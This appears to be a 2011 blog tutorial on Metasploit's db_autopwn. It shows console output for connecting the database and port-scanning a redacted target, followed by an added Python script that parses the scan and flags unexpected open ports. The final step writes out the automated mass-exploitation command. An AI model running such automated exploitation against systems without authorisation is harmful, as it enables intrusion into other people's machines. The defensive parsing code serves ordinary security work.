Friday, May 6, 2011

Metasploit db_autopwn (Postgres)

Step 1: Show the active database driver.
msf exploit(psexec) > db_driver
[*] Active Driver: postgresql
[*] Available: postgresql

[*] DB Support: Enable the mysql driver with the following command:
[*] $ gem install mysql
[*] This gem requires mysqlclient headers, which can be installed on Ubuntu with:
[*] $ sudo apt-get install libmysqlclient-dev

Step 2: Connect to the local database.
msf exploit(psexec) > db_connect postgres@localhost
NOTICE: CREATE TABLE will create implicit sequence "hosts_id_seq" for serial column "hosts.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "hosts_pkey" for table "hosts"
NOTICE: CREATE TABLE will create implicit sequence "clients_id_seq" for serial column "clients.id"
NOTICE: CREATE TABLE / PRIMARY KEY will create implicit index "clients_pkey" for table "clients"
NOTICE: CREATE TABLE will create implicit sequence "services_id_seq" for serial column "services.id"

...

Step 3: Run nmap through db_nmap to enumerate the services of the target system(s); the results are stored in the connected database.
msf exploit(psexec) > db_nmap [target]
[*] Nmap: Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-06 15:55 EDT
[*] Nmap: Nmap scan report for [target]
[*] Nmap: Host is up (0.021s latency).
[*] Nmap: Not shown: 995 filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 25/tcp open smtp
[*] Nmap: 110/tcp open pop3
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps

Step 4: Run db_autopwn against the hosts and services now recorded in the database.
msf exploit(psexec) > db_autopwn -p -t -e -b
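The point of Step 3 is that db_nmap turns the console output above into host and service records, and Step 4 keys on the open ports in those records. The following added example (not part of the original post or of Metasploit) parses the `[*] Nmap:` lines shown above into the same host/port/service structure and then reports which exposed ports fall outside an expected allowlist, which is the check a defender wants before an automated scan of this kind reaches the box. The log text is constructed from the post's own output; the allowlist is a hypothetical value.

```python
import re
from collections import defaultdict

# Constructed sample, copied from the db_nmap output shown in the post
# ([target] is the redacted host name used there).
SAMPLE_LOG = """\
[*] Nmap: Starting Nmap 5.21 ( http://nmap.org ) at 2011-05-06 15:55 EDT
[*] Nmap: Nmap scan report for [target]
[*] Nmap: Host is up (0.021s latency).
[*] Nmap: Not shown: 995 filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 25/tcp open smtp
[*] Nmap: 110/tcp open pop3
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps
"""

# "Nmap scan report for host" or "Nmap scan report for host (1.2.3.4)";
# when an address in parentheses is present we key the host on it.
HOST_RE = re.compile(r"^\[\*\] Nmap: Nmap scan report for (\S+)(?: \((\S+)\))?")
PORT_RE = re.compile(r"^\[\*\] Nmap: (\d+)/(tcp|udp)\s+(\S+)\s+(\S+)")


def parse_db_nmap(log):
    """Return {host: [(port, proto, state, service), ...]} from msf console text."""
    hosts = defaultdict(list)
    current = None
    for line in log.splitlines():
        m = HOST_RE.match(line)
        if m:
            current = m.group(2) or m.group(1)
            hosts.setdefault(current, [])  # record hosts with no open ports too
            continue
        m = PORT_RE.match(line)
        if m and current is not None:
            port, proto, state, service = m.groups()
            hosts[current].append((int(port), proto, state, service))
    return dict(hosts)


def open_ports(hosts):
    """Per host, the sorted list of open ports (what a port-based module match keys on)."""
    return {h: sorted(p for p, _, s, _ in svcs if s == "open") for h, svcs in hosts.items()}


def unexpected_services(hosts, allowed_ports):
    """Per host, open ports that are not in the expected allowlist (hypothetical policy)."""
    return {h: [p for p in ports if p not in allowed_ports] for h, ports in open_ports(hosts).items()}


if __name__ == "__main__":
    parsed = parse_db_nmap(SAMPLE_LOG)
    print(open_ports(parsed))
    print(unexpected_services(parsed, {25, 443}))
```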


